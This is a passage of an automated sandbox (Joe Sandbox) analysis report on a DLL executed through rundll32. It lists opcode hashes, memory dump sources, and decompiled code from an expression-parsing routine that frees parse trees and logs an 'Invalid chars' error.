                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff52c7ffbd1d9107fcbef65328e3878b9d8ec7e0a566bd5413746ddd724ee47a
                                                      • Instruction ID: 17bda300cafbee541834c927e7bcf7240875502bd3d5a4043446c7d08037228a
                                                      • Opcode Fuzzy Hash: ff52c7ffbd1d9107fcbef65328e3878b9d8ec7e0a566bd5413746ddd724ee47a
                                                      • Instruction Fuzzy Hash: 84E10775B083408FC304CE29D88060AFBF6EFC9364F598A2DF999D73A1D671E9458B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a2f94ac762cd677dc8362f514d4668eefae1739862ad9c7aa78fec698a4c789
                                                      • Instruction ID: be10b61e0e400d7f3c7b246480c7663c1106f3f721ef33eb9267169c2a0f6ae4
                                                      • Opcode Fuzzy Hash: 5a2f94ac762cd677dc8362f514d4668eefae1739862ad9c7aa78fec698a4c789
                                                      • Instruction Fuzzy Hash: 1FC14D3160496CCFD75CEF29D8E48753393ABE831174B86ADD6034B3A5CA30B925DB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b2f5e3a6e755b5cd1ec8c14b0b22a304fa7b3516a21b49beeeb033897322eaa
                                                      • Instruction ID: 89953b31e04fa7be04450d99485250ae3be7f122ea8c091805a4f71ec7c47705
                                                      • Opcode Fuzzy Hash: 8b2f5e3a6e755b5cd1ec8c14b0b22a304fa7b3516a21b49beeeb033897322eaa
                                                      • Instruction Fuzzy Hash: CEC15F302087959FC741DF2AC4805A6FBF1EF9A200F49C55EE8D8CB346D634EA15DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee0655b07f9a60d7e6c93e24dd163bbcdd8dd7aa916f57eec32edbbdc4cc49b7
                                                      • Instruction ID: 1db670544306bd251aebef4a7dbe6716f8247bd2a01bbc6002f53e6d6edf3967
                                                      • Opcode Fuzzy Hash: ee0655b07f9a60d7e6c93e24dd163bbcdd8dd7aa916f57eec32edbbdc4cc49b7
                                                      • Instruction Fuzzy Hash: 7BA14C745083168BD750DF16E4442AFF7E0FF94B84F958A2EF898DB250E234D981DB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e2dad646239292c082a3e3cd6a8f2edab19a4e84d94e2075355bf024ee8a0388
                                                      • Instruction ID: 14d1569ad32843df1e0f4a955a3229223ca10cf1b234f8bfe071cdd5ef662ba1
                                                      • Opcode Fuzzy Hash: e2dad646239292c082a3e3cd6a8f2edab19a4e84d94e2075355bf024ee8a0388
                                                      • Instruction Fuzzy Hash: 3CB128396083568FC754CF29C4C088BB7E2FF88314B66892DE959CB325E770F9558B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d016340bc325db1fd1648bbb37fa4be5db1333341c3535a9616d09fdc8b0c0ba
                                                      • Instruction ID: 5b61de884d90df82446b19460e85b2eea36a0198e06777fdadc74bd29ad9c96a
                                                      • Opcode Fuzzy Hash: d016340bc325db1fd1648bbb37fa4be5db1333341c3535a9616d09fdc8b0c0ba
                                                      • Instruction Fuzzy Hash: DDB15F302087959FC745DF2AC4805A6FBF1AF9A200F89C55EE8D8CB347D634EA15DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
                                                      • Instruction ID: 8c294614796abfce7a9b313687c0130c20c351539878b9b69ed8c38673feebb7
                                                      • Opcode Fuzzy Hash: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
                                                      • Instruction Fuzzy Hash: 2DA134356002118FD398DE1FD8D0D6A7393ABC432DF5BC26E9E445B3AACD38B4669790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
                                                      • Instruction ID: a9fd71970cc6ae0704401159e34ccb1fdaf457640d2c7af12330d1c819c8daf0
                                                      • Opcode Fuzzy Hash: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
                                                      • Instruction Fuzzy Hash: 8941B173F2582507E7188828CC05319B2C3DBE4271B1EC37AED59EB789E934ED1686C2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e5339e86325d42bd6281c81f51f6f83cb80fe511d73c762a27f573bff63cef8
                                                      • Instruction ID: 40aabe202a40184f6c89db9be28c5e271f9100c876ec067dbcd78a5b86649b1c
                                                      • Opcode Fuzzy Hash: 2e5339e86325d42bd6281c81f51f6f83cb80fe511d73c762a27f573bff63cef8
                                                      • Instruction Fuzzy Hash: 5681CD745042528FDB94CF29C5C0A96BBE1FF99310F5988B9ED9C8F61AE230A941DF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b576644014d14f1c54322c87fd66bbfde8640324f1e42ad5ea2fc848f20d65e
                                                      • Instruction ID: 3b5e75aad5a0c08e1416bd72158d909f1297ac2347114389bb20aec0d49765e5
                                                      • Opcode Fuzzy Hash: 7b576644014d14f1c54322c87fd66bbfde8640324f1e42ad5ea2fc848f20d65e
                                                      • Instruction Fuzzy Hash: 26516B71A043148FC314DF5AC480956B3E1FF8C218F8A896EDA855B363CB74B812CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
                                                      • Instruction ID: 9aaf14044436f1b2b42603b9fb6b72ce4f3e40e728a04a0e74472568190d7af2
                                                      • Opcode Fuzzy Hash: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
                                                      • Instruction Fuzzy Hash: 5E419866B0833196E314ABEDF4C049DF2E1FED1BA1B824A69D2952F141D330D449C7E7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
                                                      • Instruction ID: 6d93bd8323a72235920ba6e149a4a7bae96c73b66a2dfad555009d0c6ff0ce4f
                                                      • Opcode Fuzzy Hash: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
                                                      • Instruction Fuzzy Hash: 5311D2B3F2453203E71CD4199C2136D828387E82B071FC23FDE47A7286EC609D5682D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
                                                      • Instruction ID: 192b5b8e635135c3962563ef613f7b52fce4010c0b042699b34e9086fceffb22
                                                      • Opcode Fuzzy Hash: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
                                                      • Instruction Fuzzy Hash: 38316F651087D85ECB11CF3544904EABFE09EAB581B09C49EF8E84B247C524EB09EB71
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
                                                      • Instruction ID: 7615e6e647f5862a10f08712ea71b14590be4302af2179b17c0dfb1654340f57
                                                      • Opcode Fuzzy Hash: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
                                                      • Instruction Fuzzy Hash: FF2122726042658BCB14DE19C8D86AB73E2FBC9314F168A68E9C55F205C234F84ACBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
                                                      • Instruction ID: bcaa8491dccb865917a35a3d808823525e0e43ff59a73624eea8fea794acadd0
                                                      • Opcode Fuzzy Hash: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
                                                      • Instruction Fuzzy Hash: 141134326041618BCB15CE69C8D86AA73D2FBC9315F17C968E9C69F245C334F94ACBD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
                                                      • Instruction ID: f8771a243a862af8759e5689c7b57640d36b1020b076dab7645bd5d8fe9118fc
                                                      • Opcode Fuzzy Hash: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
                                                      • Instruction Fuzzy Hash: BDF0F676B1435947E900DF459C40B8BB7D9FFC42D8F16052EED48A3305C630BD0586A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 566e91d0b8d452359c7bb78fe999ee31250548b62ca49a35f0ac2a50155920e7
                                                      • Instruction ID: fb49bc79d4318df5132ff4e8978937c42cbf5c601f0cfd761cb428f5592a7514
                                                      • Opcode Fuzzy Hash: 566e91d0b8d452359c7bb78fe999ee31250548b62ca49a35f0ac2a50155920e7
                                                      • Instruction Fuzzy Hash: 19E0C9B62193159FE314DE09E8808A7FBECEBD8664B10492FF4C493300C231AC448BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 117 10017162-10017164 118 1001717e-10017184 117->118 119 10017177-1001717c 118->119 120 10017186-10017189 118->120 119->118 122 1001719a-10017637 call 10015f80 119->122 120->119 121 1001718b-1001718d 120->121 123 10017170-10017172 121->123 124 1001718f-10017191 121->124 123->119 127 10017174-10017176 123->127 126 10017193-10017198 124->126 124->127 126->118 126->122 127->119
                                                      APIs
                                                      Strings
                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_mallocz
                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                      • API String ID: 1901900789-1422635149
                                                      • Opcode ID: b9b5404f8f7a3a855f615fbe720d284632f6c1f76810d66ba6a38d70fdf3f15c
                                                      • Instruction ID: bac24a0257c5d849bb0dbfe2b802779c263aec53df092acb8c93c3cd01452c15
                                                      • Opcode Fuzzy Hash: b9b5404f8f7a3a855f615fbe720d284632f6c1f76810d66ba6a38d70fdf3f15c
                                                      • Instruction Fuzzy Hash: CBE184B89097819FC780DF68C48191ABBF1FF88250F85586DF8C58B316E735E881CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 91%
                                                      			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
                                                      				intOrPtr _t116;
                                                      				void* _t118;
                                                      				intOrPtr* _t120;
                                                      
                                                      				_t116 = __esi;
                                                      				_a12 = __eax;
                                                      				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                      				__edx = 0x10;
                                                      				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                      				__eax =  &_a60;
                                                      				_a16 = __ebx;
                                                      				_a4 = 0x10;
                                                      				 *__esp =  &_a60;
                                                      				__eax = L10023A40();
                                                      				_a48 = __edi;
                                                      				if(__edi != 0) {
                                                      					__eax =  *(__edi + 0x18);
                                                      					_a52 = __eax;
                                                      					if(__eax != 0) {
                                                      						__edx = __eax[0x18];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x1c];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x20];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						E100265C0(__eax);
                                                      						__eax =  &_a52;
                                                      						E100265C0( &_a52);
                                                      						__edi = _a48;
                                                      					}
                                                      					__eax =  *(__edi + 0x1c);
                                                      					_a52 = __eax;
                                                      					if(__eax == 0) {
                                                      						L22:
                                                      						__eax =  *(__edi + 0x20);
                                                      						_a52 = __eax;
                                                      						if(__eax == 0) {
                                                      							L30:
                                                      							E100265C0(__edi);
                                                      							__eax =  &_a48;
                                                      							E100265C0( &_a48);
                                                      							goto L1;
                                                      						}
                                                      						__edx = __eax[0x18];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x1c];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x20];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						E100265C0(__eax);
                                                      						__eax =  &_a52;
                                                      						E100265C0( &_a52);
                                                      						__edi = _a48;
                                                      						goto L30;
                                                      					} else {
                                                      						__edx = __eax[0x18];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x1c];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						__edx = __eax[0x20];
                                                      						_a56 = __edx;
                                                      						if(__edx != 0) {
                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                      							_a56 =  *(_a56 + 0x1c);
                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                      							_a56 =  *(_a56 + 0x20);
                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                      							__eax = _a56 + 0x24;
                                                      							E100265C0(_a56 + 0x24);
                                                      							__eax =  &_a56;
                                                      							E100265C0( &_a56);
                                                      							__eax = _a52;
                                                      						}
                                                      						E100265C0(__eax);
                                                      						__eax =  &_a52;
                                                      						E100265C0( &_a52);
                                                      						__edi = _a48;
                                                      						goto L22;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				 *_t120 = _t116;
                                                      				L100265B0();
                                                      				return _t118;
                                                      			}






                                                      0x10017581
                                                      0x10017586
                                                      0x1001758d
                                                      0x10017592
                                                      0x10017592
                                                      0x10017596
                                                      0x10017599
                                                      0x1001759f
                                                      0x100175a7
                                                      0x100175b0
                                                      0x100175b6
                                                      0x100175bf
                                                      0x100175ca
                                                      0x100175ce
                                                      0x100175d4
                                                      0x100175d9
                                                      0x100175e0
                                                      0x100175e5
                                                      0x100175e5
                                                      0x100175ef
                                                      0x100175f4
                                                      0x100175fb
                                                      0x10017600
                                                      0x00000000
                                                      0x100173cd
                                                      0x100173cd
                                                      0x100173d0
                                                      0x100173d6
                                                      0x100173de
                                                      0x100173e7
                                                      0x100173ed
                                                      0x100173f6
                                                      0x10017401
                                                      0x10017405
                                                      0x1001740b
                                                      0x10017410
                                                      0x10017417
                                                      0x1001741c
                                                      0x1001741c
                                                      0x10017420
                                                      0x10017423
                                                      0x10017429
                                                      0x10017431
                                                      0x1001743a
                                                      0x10017440
                                                      0x10017449
                                                      0x10017454
                                                      0x10017458
                                                      0x1001745e
                                                      0x10017463
                                                      0x1001746a
                                                      0x1001746f
                                                      0x1001746f
                                                      0x10017473
                                                      0x10017476
                                                      0x1001747c
                                                      0x10017484
                                                      0x1001748d
                                                      0x10017493
                                                      0x1001749c
                                                      0x100174a7
                                                      0x100174ab
                                                      0x100174b1
                                                      0x100174b6
                                                      0x100174bd
                                                      0x100174c2
                                                      0x100174c2
                                                      0x100174cc
                                                      0x100174d1
                                                      0x100174d8
                                                      0x100174dd
                                                      0x00000000
                                                      0x100174dd
                                                      0x100173c7
                                                      0x1001724f
                                                      0x1001724f
                                                      0x10017252
                                                      0x10017260

                                                      APIs
                                                      Strings
                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$mv_expr_free$mv_log
                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                      • API String ID: 75827668-1422635149
                                                      • Opcode ID: 868f8d433a9d4ff7ca381ed327b9c79258ebc14a83ef6ba52564f0dccba394d0
                                                      • Instruction ID: 47d116fedaedebc931fd27d2d79ea71f155cf045d5fda504e80a0eb2e0d77697
                                                      • Opcode Fuzzy Hash: 868f8d433a9d4ff7ca381ed327b9c79258ebc14a83ef6ba52564f0dccba394d0
                                                      • Instruction Fuzzy Hash: 86C146B95097519FC784EFA8D48581EBBE0FF88350F85586DF8C18B316E735E8848B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • mv_expr_parse.MAIN ref: 10017862
                                                        • Part of subcall function 10017110: strlen.MSVCRT ref: 10017141
                                                        • Part of subcall function 10017110: mv_malloc.MAIN ref: 1001714A
                                                      • mv_expr_free.MAIN ref: 100178D7
                                                      • mv_expr_free.MAIN ref: 100178E6
                                                      • mv_expr_free.MAIN ref: 100178F5
                                                      • mv_freep.MAIN ref: 10017904
                                                      • mv_freep.MAIN ref: 1001790C
                                                      • mv_expr_free.MAIN ref: 10017926
                                                      • mv_expr_free.MAIN ref: 10017935
                                                      • mv_expr_free.MAIN ref: 10017944
                                                      • mv_freep.MAIN ref: 10017953
                                                      • mv_freep.MAIN ref: 1001795B
                                                      • mv_expr_free.MAIN ref: 10017975
                                                      • mv_expr_free.MAIN ref: 10017984
                                                      • mv_expr_free.MAIN ref: 10017993
                                                      • mv_freep.MAIN ref: 100179A2
                                                      • mv_freep.MAIN ref: 100179AA
                                                      • mv_freep.MAIN ref: 100179B9
                                                      • mv_freep.MAIN ref: 100179C5
                                                      • mv_expr_free.MAIN ref: 100179EE
                                                      • mv_freep.MAIN ref: 10017A1B
                                                      • mv_freep.MAIN ref: 10017A23
                                                      • mv_freep.MAIN ref: 10017A79
                                                      • mv_freep.MAIN ref: 10017A81
                                                      • mv_expr_free.MAIN ref: 10017A6A
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100159C5
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100159D1
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100159E0
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100159EC
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100159FB
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015A07
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015A16
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015A22
                                                      • mv_expr_free.MAIN ref: 10017A5B
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001584F
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001585B
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100158A2
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100158AE
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100158BD
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100158C9
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001591F
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001592B
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015972
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001597E
                                                      • mv_expr_free.MAIN ref: 10017A4C
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156C6
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156D5
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156E1
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156F0
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100156FC
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015770
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001577C
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 1001579A
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100157A6
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 100157FC
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015808
                                                      • mv_freep.MAIN ref: 10017A90
                                                      • mv_freep.MAIN ref: 10017A9C
                                                      • mv_expr_free.MAIN ref: 10017AC5
                                                      • mv_expr_free.MAIN ref: 10017AD4
                                                      • mv_expr_free.MAIN ref: 10017AE3
                                                      • mv_freep.MAIN ref: 10017AF2
                                                      • mv_freep.MAIN ref: 10017AFA
                                                      • mv_expr_free.MAIN ref: 10017B14
                                                      • mv_expr_free.MAIN ref: 10017B23
                                                      • mv_expr_free.MAIN ref: 10017B32
                                                      • mv_freep.MAIN ref: 10017B41
                                                      • mv_freep.MAIN ref: 10017B49
                                                      • mv_expr_free.MAIN ref: 10017A32
                                                        • Part of subcall function 10015280: mv_freep.MAIN ref: 10015588
